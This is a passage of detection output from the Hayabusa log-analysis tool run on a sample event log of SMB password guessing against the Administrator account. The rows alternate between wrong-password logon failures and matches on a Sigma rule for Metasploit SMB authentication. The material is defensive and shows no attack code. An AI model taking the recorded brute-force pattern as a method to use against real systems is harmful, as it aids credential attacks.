Password,User: Administrator : Type: 3 : Workstation: rGYNVrDBIpMBu9GT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 57qCysbeaXx12CbY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyJl4mHvgtTv53d9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGBDZCtot2ogcKIO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bBhmbqZIi1gX62mM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o7d4bcBJV1jlRgdt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtfFb6hMHJiFXxai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frlsZMDcdb5WaW99 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CFV8UiUTRCCfab9l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZI8P6ZeVRmQlbGtz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: UmJI7S1nj5hfWZqv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: veh8XInSzXe8E9UD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1BuBHLILZ4afwJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NN2h7CHnGSCQZXan : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BU3fxfM1qGBJ55HS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1OlBmhUABabDQbN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DgQtHG7cT05kRXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUTe3JqVWgDcDcOS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nGKgUOyX3USQlESB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcIJ8keQvgax1SuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: A7jsyA7bWtVf4sLr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mijnM28fwbgWzkvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dNmJo7vkacqxA6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FxvD2OWtadDT1Q2c : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK8Esc50KVWIsLU5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U07NeCzXSdx5Nlgs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tObVl72GJse2HCGp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nbEnp2E5a3N78OBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlRmyinJLWwj5yQg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92H7tdXinUOxtOLV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Za42EUNuitIXaMBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kz7OtswOreS0fdeS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VMxY1IHx5VuvskM7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d6uxMqLCcqHkuesV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TmeAWYvFEbqJp1rt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tGAdT1CBRYRatVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0h9ulMPWtj8bEKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eLyLMNv6cOp3sgrq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIAOs16X8nFxV45x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z4EbyEaUxUEyuiY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SDnW5GABBLbe6eZ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GublgQLD3RXQNmkX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BQRppHTUHAoWPe4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gnh6HFlIW1zWEBu5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ulbcy5PWLYUm5Sy0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L8rkZ7iBMam5o8VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n39Zox0PFeNirzyT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
